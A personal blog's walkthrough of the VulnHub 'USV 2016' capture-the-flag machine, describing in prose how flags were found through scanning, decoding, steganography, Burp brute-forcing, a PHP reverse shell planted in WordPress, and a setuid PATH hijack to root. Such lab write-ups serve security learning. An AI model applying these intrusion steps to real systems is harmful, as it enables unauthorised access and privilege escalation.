Fri. Jul 3rd, 2020

Pentesting Fun Stuff

following the cyber security path…

USV: 2016

Location

https://download.vulnhub.com/usv-2016/USV-CTF.ova

Introduction

Instructions: The CTF is a virtual machine and has been tested in Virtual Box. It has all required drivers if you want it to run on VMware or KVM (virtio). The network interface of the virtual machine will take it`s IP settings from DHCP.
Flags: There are 7 flags that should be discovered in form of: Country_name Flag: [md5 hash]. In CTF platform of the CTF-USV competition there was a hint available for each flag, but accessing it would imply a penalty. If you need any of those hints to solve the challenge, send me a message on Twitter @gusu_oana and I will be glad to help.
About: CTF-USV 2016 was the first International Students Contest in Information Security organized in Romania by Suceava University. Security challenges creation, evaluation of results and building of CTF environment was provided by Safetech Tech Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ionutge1)

Getting Started

Starting with a nmap scan.

As a result I get a lot of open ports and services running on them. It seems there is SSH, HTTP, HTTP-proxy, MySQL, Kerberos and a FTP running on a registered port.
The host name is “SevenKingdoms” which is a reference to the TV show “The Game of Thrones”.
I’ll start and check if there is an interesting banner on the SSH server.

I get a nice picture and a encrypted or hash+salted string. After looking at the picture more closely I see that there is a hidden message. There are letters visible when combined spell out:   AES ECB.
There are also characters visible near the tail. So I got an encryption suit, a key and a piece of cipher text.

As this doesn’t give me the desired response, I try an online solution with more luck.
Italy Flag: 0047449b33fbae830d833721edaef6f1
Next stop is port 80. After browsing to the website I get a custom made error 403.

All the scans turn up with the same error 403. After I ran Nikto I got a result that directory   /icons/ was accessible. Because there were a lot of pictures I could wget them all (in the hope one is altered), but because there are more leads to follow I write it down and continue the search.
When I run the website again, but this time through Burpsuite, I can see that there is a XSS protection in the server response in the form of a base64 encoded string.
Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==
After a quick decode I get my second flag:   Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb
There are more open ports. One is a squid proxy server on port 3129. After some reading I learned that squid is a web proxy cache server application which provides proxy and cache services for a whole list of services like HTTP. So my next step is to run my browser through that proxy and see if the website on port 80 will run.

With dirb I find a blog.

After I browsed to the blog I found a few things that got my attention. One of them was a picture of Hodor with the text   I have a message for you!.

After downloading it to my machine there was nothing to be found with exiftool or hexdump. But inside the folder where the picture resided there was something. A zipped file.
When I downloaded the file and extracted the picture that was inside, I got another view of Hodor. This time with my next flag. The string was part of the picture and not as metadata, so I used an online OCR scanner to get the string the easy way.

Next I proceed with the second interesting find on the website. A protected area for which I need a password. Because there is a lot of text on the website about “The Game of Thrones” I figure that the password could be somewhere in there. So I create a wordlist with Cewl.

To understand the process of the submitting of the password I followed the HTTP requests in Burp. When I enter a random password the process starts with a POST request followed by a GET request which has a cookie added to it. This cookie consists of the encoded password I entered.


So for me to successfully brute-force the password I need Burpsuite to follow the redirects and add given cookies.


With this password I get the next flag.

On the same page there is a clue about a password.

At first I thought about the password and the possibility that the facial expressions showed a clue. But I’ve learned from previous challenges that the easiest explanation is often the best and the needed credentials are in plain sight. So I needed to interpret the text as literal as possible.
The “mother_of_dragons” has a password which is “in front of your eyes”.
With this credential I checked the leftover services running on the open ports. When I use it on the FTP server it let me in.

On the server there is a file called “readme.txt”. The content of this file is “I keep a hidden note for myself”. A hidden ‘note’. Like before the answer is in plain sight. The mentioned hidden note I found when browsing to “/.note.txt”
I always forgot passwords, so for my blog account I used my children`s name. -= Daenerys =-
No flag, but a good clue about the password needed for the admin part of wordpress blog.
The clue said “children’s name”, plural. So it could be her son or maybe the dragons as she sees them as her children.
Because there is a nice feature to let me reset the password I could figure out which username was the correct one. At first I thought it was “Daenerys”, but it seemed it was still “mother_of_dragons”. As for the correct password, it was a combination of all the dragon names that got me in.

After some browsing I found the next flag which was in the profile of the mother of dragons.

To get a reversed shell I altered the search.php file and added the php reverse shell script from pentestmonkey to it. Next I opened up a listener on my end and pressed the search button to activate the shell script.

After searching inside the system I found the next flag.

There is a file called “winterfell_messenger” which is owned by root.

When I run it I can see it tries to use the command “cat” and read a file called “/root/message.txt”.

So the “setuid” bit is set and the command “cat” is used with a relative path instead of an absolute path. To obtain root I’m going to create a file called “cat” which has as content “/bin/bash”.
The location of this file will be added to PATH so it will run my version of “cat”.

After getting root it’s time to get the final flag.

Conclusion

A fun challenge with some nice features.
 
 
 

3 thoughts on “USV: 2016

  1. Could you please post exactly how to set up BURP SUITE — I’ve spent like 3 days going through different POST and GET and transitioning between what to define in the ADD portion and launching attacks to brute fore the password….I’m on the Secret Chapter page… But what should the Target IP and Port be, the Positions (what to define in the ADD), the Payloads (CEWL wordlist), and options. I’m getting 400’s and 403’s on both POST and GET – but joy on finding a 200 listing for the password.
    I can get the Cookies and forwards from the webpage. I’m starting with the actual server refresh then re-doing the Settings in Ice Weasel to 127.0.0.1 8080 – and submitting a 1234 password to get a response. At some point, I changed it back to the USV server’s IP address and start new attacks…but nothing…
    Many Thanks! J

    1. Hi Jo.
      In my write-up I’ve explained that you need to enable the options ‘follow redirections’ and ‘process cookies’.
      The rest is normal procedure with a brute-force attack. You need to acquire the wordlist and run the attack.
      As you can see in my example you will get a lot of code 200. But there is one thing that stands out from the rest. If you find that, you’ll find the password.
      If you need more information on how Burpsuite works, this will be a great read: part 1 and part 2

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.